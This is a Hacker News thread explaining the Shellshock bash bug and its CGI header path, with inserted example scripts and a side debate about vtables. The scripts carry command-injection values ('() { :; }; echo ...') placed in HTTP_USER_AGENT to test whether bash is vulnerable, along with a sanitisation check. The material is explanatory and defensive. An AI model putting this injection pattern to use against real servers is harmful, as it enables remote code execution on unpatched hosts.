Hacker News

In bash, function definitions can be exported via environment variables; in handling that, bash also executes whatever immediately follows the function definition. Apache sets environment variables (without sanitizing them for the above) based on incoming HTTP request headers, which are controlled by end-user clients.

Because this functionality in bash predated Apache, it could be argued that Apache ought to perform sanitization before setting env vars from user input given that bash might execute it, but on the other hand bash's ability for data to be executed as code was pretty much undocumented and is now considered the bug.

Wikipedia has a good explanation at http://en.wikipedia.org/wiki/Shellshock_(software_bug)
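The data path the comment describes, as an added example that is not code from this thread, from Apache or from bash: mod_cgi exports each request header as HTTP_<HEADER_NAME> in the CGI process environment, so a client-chosen User-Agent reaches a bash-based CGI script as HTTP_USER_AGENT. The script below stands in for mod_cgi, feeds a constructed malicious header value into that variable, and classifies the local bash as "vulnerable" or "patched" depending on whether the trailing command ran during bash start-up. The PAYLOAD string and the function names are the example's own.

```shell
# Added example (not from the thread, Apache or bash). Reproduces the
# Shellshock data path with no web server: a header value is placed into
# HTTP_USER_AGENT, exactly the variable name mod_cgi would use, and a bash
# "CGI script" is started with that environment.

# Constructed malicious header value. Pre-fix bash parsed any variable whose
# value began with "() {" as a function definition and then kept parsing,
# executing whatever followed the closing brace.
PAYLOAD='() { :; }; echo SHELLSHOCK_EXECUTED'

# Stand-in for mod_cgi launching a bash CGI script. The script never reads
# HTTP_USER_AGENT; the damage, if any, happens while bash initialises.
run_cgi() {
    env "HTTP_USER_AGENT=$PAYLOAD" bash -c 'printf "Content-Type: text/plain\n\nok\n"'
}

# "vulnerable" if the injected command ran during bash start-up, "patched" otherwise.
shellshock_status() {
    if run_cgi 2>/dev/null | grep -q SHELLSHOCK_EXECUTED; then
        echo vulnerable
    else
        echo patched
    fi
}

# The Apache-side sanitisation the comment says could be argued for: reject a
# header value that carries bash's function-export marker before it is placed
# in the environment. Bash only compared the first four characters, "() {",
# so that is all this check looks at (defence in depth; the real fix is
# patching bash).
is_function_export() {
    case "$1" in
        "() {"*) return 0 ;;
        *)       return 1 ;;
    esac
}

shellshock_status
```

On any bash built after the 2014 fixes this prints "patched"; the widely circulated one-liner from that week, `env x='() { :;}; echo vulnerable' bash -c "echo this is a test"`, is the same probe with a plain variable name instead of the CGI one.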




> but on the other hand bash's ability for data to be executed as code was pretty much undocumented and is now considered the bug.

From the article you linked:

> Since Bash is both a command interpreter and a command, it is possible to execute Bash from within Bash. When this happens, the original instance can export environment variables and function definitions into the new instance.[16] Function definitions are exported by encoding them within the environment variable list as variables whose values begin with parentheses ("()") followed by a function definition. The new instance of Bash, upon starting, scans its environment variable list for values in this format and converts them back into internal functions.

I had this strange feeling after reading this: that it's been a long time since people worked with low-level code. It's like the difference between method dispatch in C++ and, say, Python. In the latter, it's magic, it works and you don't care. In the former, it's part of basic language knowledge to understand how virtual methods are implemented by a hack involving pointers to arrays of function pointers (a.k.a. vtables).
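The export encoding the quoted Wikipedia passage describes, shown directly, as an added example that is not from the thread or from Wikipedia. A function is defined and exported with `export -f`, the raw environment entry that carries it is printed, and a grandchild bash is shown calling the function without ever having defined it. The function name "greet" is the example's own; bash must be installed.

```shell
# Added example (not from the thread or Wikipedia). Exporting a function puts
# an ordinary environment variable into the child's environment whose value
# begins with "()" followed by the function body; a new bash scans its
# environment for such values and turns them back into functions.

# Print the raw environment entry that carries the function. Pre-fix bash
# used the bare function name as the variable name (greet=() { ...); bash
# 4.3 patch 27 and later use BASH_FUNC_greet%%=() { ... so that ordinary
# variables, such as CGI's HTTP_* ones, are never mistaken for functions.
# The bracket expression lets the grep match either naming (and vendor
# variants of the prefix). Only the first line of the multi-line value is
# printed.
function_env_entry() {
    bash -c 'greet() { echo "hello $1"; }; export -f greet; env' \
        | grep -- 'greet[%()]*=() {'
}

# The grandchild bash finds that entry at start-up and rebuilds the function,
# so "greet world" works even though this bash -c never defines greet.
child_calls_exported_function() {
    bash -c 'greet() { echo "hello $1"; }; export -f greet; bash -c "greet world"'
}

function_env_entry
child_calls_exported_function
```

On a current bash the first line printed starts with `BASH_FUNC_greet%%=() {`; the second is `hello world`. The Shellshock bug was that the parser, after rebuilding the function from such a value, continued parsing and executed anything that followed the closing brace.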


> In the former, it's part of basic language knowledge to understand how virtual methods are implemented

Since when? While Hex-Rays' IDA let me dig into exactly how vtables work, it's not like you even need to have heard of vtables before you can stick the word 'virtual' in the right place for your code to do what you want.

Similarly: if you're a long-time Python programmer and have never looked into the internals, it's a good exercise. There's (in CPython) a CALL_FUNCTION instruction; PyEval_EvalFrameEx (in Python/ceval.c) dispatches that (and, well, all) opcodes. And... and... It's not magic, yes it does work, I don't know if you care, I certainly do.

If you want to be ignorant of the lower-levels of code, Python certainly makes it easier (strings are an easy-to-use built-in language feature? madness!), but let's not pretend every programmer who has ever touched C++ has heard of vtables.
